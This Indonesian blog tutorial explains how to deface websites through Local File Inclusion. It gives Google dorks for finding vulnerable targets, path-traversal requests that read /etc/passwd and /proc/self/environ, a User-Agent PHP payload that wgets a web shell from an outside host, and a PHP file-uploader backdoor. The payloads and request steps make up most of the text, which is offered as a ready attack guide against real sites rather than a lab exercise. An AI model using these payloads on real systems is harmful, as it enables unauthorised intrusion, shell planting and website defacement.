Tutorial LFI – Cara Deface Website dengan Teknik Local File Inclusion. Sebenernya ini exploit lama banget. Malah bisa dibilang basic kalo kalian pengen belajar pentest web. Setara sama SQLi lah . Tapi post aja biar isi blog nya lengkap, sebagai arsip pribadi juga hehe.
Langsung saja, disini yang dibutuhkan cuma Browser Mozilla dengan addons tamper data.
Google Dorks :
- inurl:/view/lang/index.php?page=?page=
- inurl:/shared/help.php?page=
Use your brain , b1tch !
Saya anggep sudah dapat site vuln nya.
Pertama, test basic apa web tersebut vuln LFI.
- localhost/view.php?page=email.php
Coba ganti email.php dengan ../../
- localhost/view.php?page=../../
Jika kalian dapat error seperti
Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
Viola ! 😀 Ada kesempatan untuk membuka localfile yang lebih sensitif 😀
Kita coba panggil file /etc/passwd nya .
- localhost/view.php?page=etc/passwd
Masih error ?
Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337
Kita coba naikkan direktori nya.
- localhost/view.php?page=../../../../../etc/passwd
Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin
…. dsb :p
Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak. Karena disinilah proses inject backdoor akan dimulai.
- localhost/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337 REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php SERVER_ADDR=1xx.1xx.1xx.6x [email protected] SERVER_NAME=localhost SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80
Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.
Langkah selanjutnya, aktifkan tamper data.
Load halaman localhost/view.php?page=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di addons tamper data tadi isi dengan
<?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>
Lalu submit.
Shell kalian akan terletak di
- localhost/fvck.php
Pada beberapa kasus, fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget melalui cara diatas.
Tapi ada cara lain.
Pad user-agent masukkan script uploader berikut :
<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p> <h1> shu </h1></p> <br> <form action="" method="post" enctype="multipart/form-data"> Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
Setelah diupload, maka shell akan terletak di root path domain.
Jika masih bingung, berikut videonya:
Sekian tutor kali ini semoga bermanfaat.
Comments